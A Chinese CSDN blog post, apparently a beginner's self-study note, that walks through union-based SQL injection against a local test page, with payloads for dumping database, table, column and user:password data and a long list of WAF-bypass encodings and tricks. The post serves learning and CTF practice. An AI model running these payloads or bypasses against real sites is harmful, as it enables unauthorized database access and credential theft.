小白网安自学路第一篇--SQL注入

最新推荐文章于 2023-06-02 18:01:17 发布
最新推荐文章于 2023-06-02 18:01:17 发布
阅读量337 收藏
点赞数
分类专栏: 小白网安自学路 文章标签: sql mysql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wing_bsj/article/details/112602174
版权

小白网安自学路第一篇–SQL注入

sql注入概念

sql注入,web应用未对用户传入数据的合法性进行判断或者过滤不严,攻击者将传入参数拼接在数据库查询的sql语句中,从而达到对数据库进行非法操作的目的。

sql注入基本原理

先来一个sql语句:

select * from article where id= ('1')

这个1,即为用户传入的参数,这个参数不止是在各种表单提交处,搜索框,还有一些动态跳转页面,就像是php?page=…,这个page后面的数据有时候也是有可能需要提交到数据库中的,所以请多多尝试。

现在这个sql语句对应的url是http://127.0.0.1:81/search.php?id=1

这个id即是我们提交上数据库的参数,现在问题来了。我们应该如何提交这个参数,使得这个提交能返回我们想要的东西呢?在回答这个问题前,先总结一下sql注入的基本流程。

sql注入基本流程

1.找到注入点,就像最经典的插入’,使得sql语句报错。(并不是只要插入’报错,就一定是注入点。)
2.判断注入点的类型,有的是整型,有的是字符型,上面的sql语句就是字符型的,如果需要构造payload,那就基本上是1’) union …这样了;如果是整型的话,就像下面这个,构造payload,就基本可以1 union …这样子。

select * from article where id= 1

继续说说这个字符型和整型,判断注入点的不同:
你看这俩个sql语句插入‘是不是都会报错,所以’是永远的神。判断到底是不是注入点这个地方就有点不一样。上面的那个构造的语句就应该是:
这个上传的就是1’) and 1=1#

select * from article where id= ('1') and 1 = 1#')

或者没有括号的:上传的就是1‘ and ‘1’ = '1

select * from article where id= '1' and '1'='1 '

(and 1=2报错且and 1=1 与原页面是一致的话,说明这个是注入点)

整型简单直接:

select * from article where id= 1 and 1=1

and前后全正确是不是返回的页面与id=1是一模一样的?

select * from article where id= 1 and 1=2

and 1=2;1=2一定是错误的,所以就会出现错误页面。
(很多非注入点其实and 1=1会报错,and 1=2就返回原页面,我也没太懂到底是为什么,and是位运算符,0 and 0=0,按道理说应该也是会报错的才对啊。没明白,没明白。)

3.接下来,就是判断数据库表中的列数。两种方式:1 order by 10 整型这种,字符型1’ order by 10# (#为注释符) 或者union select 1,2,3…这种。正常返回即存在这么多列,返回出错即不存在这么多列,所以找交点。
关于列数,order by 查询的列数部一定是数据库表中的列数,请看:

select * from article where id= 1

select username,password from article where user= '' and  password =''

以上就是两种不同,一种是全部列,一种只需要其中的俩列,所以order by是根据sql语句来的噢!

4.联合查询嘛:

union select version(),user(),database().
group_concat(schema_name) from information_schema.schemata(爆库名)

5.联合查询爆表名:union select group_concat(table_name) from information_schema.tables where table_schema='test'
(group_concat()使多行数据在一列显示)
虽然我觉得大多数都没有访问information_schema.tables这个库的权限。

6联合查询爆列名:union select group_concat(column_name) from information_schema.columns where table_name='test1' and table_schema='test'

7.联合查询爆数据:

union select concat(user,0x3a,password) from test.test limit 0,1

(能够进行联合查询的时候,要记得把前面的参数设置得报错,要不返回不了东西的,比如最开始的select * from article where id= 1,记得把1改成-1,或者-多少都行。)

绕过小技巧(在一些地方碰到的,总结一下,随时更新):

  1. 空格被过滤:注释符绕过:/**/,#,–,%00;URL编码绕过:%2520;
  2. 关键字被过滤:双写绕过:uniunionon,seleselectct;大小写交替绕过:UNioN,SeLecT;双重URL编码绕过:unio\x6e,select\x74。
  3. CTF中知道flag所在路径,且存在sql注入:loadfile(绝对路径或者其相对路径)。
  4. asp+iis:uni%%%%%on
  5. url编码:union—%75%6E%69%6F%6E,u%6eion
  6. hex:十六进制:0x756E696F6E 绕过ids
  7. 双编码:’->%27—>%2527
  8. %u %u0053elect
  9. u+n+i+o+n
  10. php:gpc=on 对特殊字符进行转义:前加
    ‘–>\’
    绕过:
    char(91)=a
    left(userame,1)=char(97)
    宽字节
    高位 低位
    %df’–>%df\’—>%df%5c’—>運’
  11. 关键字中间%0a uni%0aon
  12. 关键字后加空格:boundary:上传漏洞
  13. hpp:http参数污染
    id=1&id=2&id=3
    .net+iis:1,2,3
    apache+php:3
  14. #
    select name as # 别名
  15. 绕过正则:%23
    %2d%2d%0a
  16. 改变提交方法:get–>post
  17. 畸形:http: ldsfr apache
  18. 科学计数:8.0union
  19. 能配符:/bin/c?t
  20. emoji:表情包,
  21. waf自身缺陷:
    处理超长字符串 7250bytes
    /aaaaaaa…/select name from admin
  22. waf自身缺陷
    安全检查:只检查前100参数

先写到这吧,以后有啥需要补充的,或者一些奇奇怪怪的东西碰到了,学到了,都会补充。

努力从来都不会被辜负,加油!

写于2021.01.14北京
更新于2021.03.22北京

灰考拉
关注
专栏目录
[网络安全自学篇] 八十.WHUCTF之WEB类解题思WP(代码审计、文件包含、过滤绕过、SQL注入
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
[网络安全自学篇] 七十一.深信服分享之外部威胁防护和勒索病毒对抗
热门推荐
杨秀璋的专栏
04-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前面三篇文章详细分享了WannaCry勒索病毒,包括病毒复现、IDA和OD逆向分析蠕虫传播、防护措施等,那么如何防护呢?所以,接下来这篇文章作者将分享来自深信服老师的《外部威胁防护和勒索病毒对抗》,带领大家看看知名安全厂商的威胁防护措施,包括网络安全面临的挑战、如何有效的应对挑战、深信服安全建设之道等。基础性文章,希望对您有所帮助,如果存在错误或不足之处,还望告知,加油!
cisp-pte基础题目之SQL注入
weixin_53313406的博客
11-25 3027
cisp-pte基础题目之SQL注入(超详细)
sql注入基础
zydbk123456的博客
10-21 546
sql注入基础 #0x01sql语句基础: 1.select语句 格式: select * from table(从table表中获取字段信息) select * from table where (在满足where后的条件下查询字段信息) 2.insert语句 格式: insert into table(field1,field2) values(value1,value2) 3.update语...
SQL注入的基本语句操作
Ephemerally的博客
10-14 404
SQL注入(Structured Query Language Injection) 是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 SQL注入的成因 开发人员在开发过程中,直接将URL中的参数、HTTP Body中的Post参数或其他外来的用户输入(如Cookies,UserAgent等)与SQL语句进
一文带你深入了解安全测试基础之SQL注入详解【建议新手收藏】
嵌入式Linux内核的博客
02-04 1261
一、什么是SQL注入 SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析并执行。 www.xx.com/news.php?id=1 www.xx.com/news.php?id=1 and 1=1 这里我们来理解一下SQL注入 首先,SQL注入常年蝉联OWASP排行榜第一名 SQL注入产生的过程是怎样的呢?见下图 SQL注入的危害有哪些?   数据库信息泄露   网页篡改   网站被挂马   数据库被恶意操作   服务器被远程控制
网安学习day12(SQL注入
m0_57485346的博客
11-18 660
网安学习12(SQL注入
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。希望您喜欢~
[网络安全自学篇] 十五.Python攻防之多线程、C段扫描和数据库编程(二)
杨秀璋的专栏
10-05 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Python网络攻防相关基础知识,包括正则表达式、Web编程和套接字通信,本文将继续分析Python攻防之多线程、C段扫描和数据库编程。本文参考了爱春秋ADO老师的课程内容,这里也推荐大家观看他Bilibili和ichunqiu的课程,同时也结合了作者之前的经验进行讲解。...
[网络安全自学篇] 七十七.恶意代码与APT攻击中的武器(强推Seak老师)
杨秀璋的专栏
05-14 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将带大家学习安天科技集团首席架构师肖新光老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。作者很少会在标题写“强推”的字样,但这篇文章真的值得学习,也希望对您有所帮助。
SQL注入题型(手工注入+sqlmap)
我了解豹女就像农民伯伯了解大米
06-27 1346
题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 目录 题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 首先进行手工注入(用’以及and或者or来进行查看是否可以进行手工注入) 用sqlmap工具进行注入:(-u指定注入的网站链接,--tamper指定防止过滤关键字符,例如空格、union) 发现并没有要找的数据,回归题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。 首先进行手工注入(用’以及and或者or来进行查看是否可以
关于SQL注入
m0_52824752的博客
02-14 245
SQL全称是Structured Query Language,是一种结构化的查询语言,用于与数据库进行交互并能够被数据库解析。SQL注入攻击是一种常见的注入攻击类型。攻击方式在用户与程序进行交互时发生的。如在表单输入、搜索框输入功能中插入SQL命令,然后发送到服务端。服务端对数据进行了解析执行,并执行了一些非预期的操作。 按照注入点类型来分类 (1)数字型注入点 在 Web 端大概是 http://xxx.com/news.php?id=1 这种形式,其注入点 id 类型为数字,所以叫数字型注入点。 这一
SQL注入最最最基础(bugku成绩单)
qq_51439282的博客
12-07 1441
SQL注入 今天在b站看了sql注入基础的视频(up主:小学生Tony君的第1天–sql注入,如何一步一步获取数据),醍醐灌顶,来此记录一下心得体会。这里我们会拿BUGKU的成绩单这一题作为例题来讲解。 题目链接:http://123.206.87.240:8002/chengjidan/ SQL注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 SQL注入原理 这里拿构造id=1
sql注入
最新发布
kuzemax的博客
06-02 1015
SQL注入原理参数用户可控:前端传递给后端的参数内容是用户可以控制的参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询当传入的id参数为1' 时,数据库执行的代码如下这不符合数据库语法规范,所以会报错。当传入的ID的参数为and 1=1时,执行的语句为因为1=1为真,且where语句中id=1也为真,所以页面返回id=1相同的结果。当传入ID参数为 and1=2,由于1=2不成立,所以返回假,页面就会返回与id=1不同的结果。
CISP-PTE SQL注入 入门篇
beirry的博客
12-21 1486
经过上一篇的文章,相信大家也初步掌握了sql语句,现在我们就来学习SQL注入的攻击语句。 mysql在版本5之前,只能通过盲注来获取数据,mysql在版本5以后,可以获取信息的方式就很多了,因为含有默认的库:information_schema,这个库存储着mysql的结构信息。我们通过这个库来获取数据表名,字段名。 判断查询类型 select * from users where id=1 这个语句意思是查询users表中id为1的所有字段,当我把这个id的字段挖空,让这个字段可以用户自己输入。那么攻击
SQLSQL 注入攻击和预防
bandaoyu的note
04-06 762
预防SQL攻击措施 如何预防SQL注入? 这是开发人员应该思考的问题,作为测试人员,了解如何预防SQL注入,可以在发现注入攻击bug时,对bug产生原因进行定位。 1)严格检查输入变量的类型和格式 对于整数参数,加判断条件:不能为空、参数类型必须为数字 对于字符串参数,可以使用正则表达式进行过滤:如:必须为[0-9a-zA-Z]范围内的字符串 2)过滤和转义特殊字符 在user...
CISP-PTE实操练习题讲解一(新版)
lza20001103的博客
08-05 1万+
CISP-PTE实操练习题讲解一(新版)
学习MySQLselect语句
开心的小包子
12-21 233
select语句可 以用回车分隔 $sql="select * from article where id=1"和 $sql="select * from article where id=1" 都可以得到正确的结果,但有时分开写或许能 更明了一点,特别是当sql语句比较长时。 批量查询数据 可以用in 来实现 $sql="select * from article where i...
DAY19(DAY20、DAY21拓展):SQL 注入
qq_49433473的博客
08-02 309
SQL 注入超详细基础,手把手带你学会 SQL 注入,已更新联合查询注入,报错注入,盲注,盲注脚本,SQLmap简单使用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值